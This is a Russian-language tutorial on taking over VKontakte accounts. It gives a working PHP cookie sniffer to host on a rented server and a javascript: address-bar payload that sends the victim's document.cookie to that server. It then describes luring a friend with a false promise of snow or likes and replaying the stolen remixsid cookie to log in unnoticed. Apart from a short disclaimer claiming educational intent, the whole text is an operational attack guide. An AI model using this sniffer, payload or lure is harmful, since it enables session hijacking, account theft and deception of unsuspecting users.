Взлом ВК(не фишинг!)
Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.
Сегодня рассмотрим способ взлома вк, который доступен каждому.
- Для начала нам необходим необходимо арендовать ftp сервер.
- На этом самом сервере создаём папку, называем её "next".
- Выбираем эту папку и жмём кнопку "chmod", появятся галочки, тыкаем на все и жмём сохранить.
- Внутри папки создаём файл index.php
Далее открываем и пишем сниффер:
<?php
//получаем данные с ссылки
$cookie = $_SERVER['REQUEST_URI'];
//ip адрес
$ip = $_SERVER['REMOTE_ADDR'];
//Создаём файл
$file = fopen("snif.dat","a+");
//вычисляем текущее время
$time = date("H:i:M:d");
//добавляем в строковую переменную куки + время + ip
$add_text = "$ip $time $cookie";
//записываем данные в файл
fputs($file,$add_text.",\r\n");
//закрываем файл
fclose($file);
//чтобы не спалили переносим пользователя обратно в вк
header('Location:https://vk.com');
?>Сниффер готов.
У нас должна получиться такая ссылка:
http://ваш_домен.ру/next/index.php
- Далее открываем любой текстовый редактор (например блокнот) и пишем:
javascript:window.location.href = "http://ваш_домен.ру/next/index.php?cookie="+document.cookie;
И скидываем это нашему дружку. Пишем ему например:
«Если поставишь это в адресную строку, на твоей странице пойдёт снег или на всех твоих фотках на странице будет по 10 000 лайков!».
Тут подход ко всем разный, надо немного использовать СИ.
Если он запустит этот скрипт в адресной строке, то его сразу переведёт на стартовую страницу Вконтакте. Никакой снег, конечно же, не пойдет там у него, но зато у нас на сервере будет дат файл с его куками.
Далее нам нужна подмена уведенных куков.
Самый простой способ:
Открываем браузер Опера > Настройки > Общие настройки > Расширенные > Cookies Opera Cookies.
Достаточно изменить только значение параметра куков remixsid.
Обновляем страницу и сразу же входим в другой аккаунт, без всякого логина и пароля. При этом наш друг не узнает, то что мы вошли на его страницу. Методы анонимности выбирайте сами. Такие дела.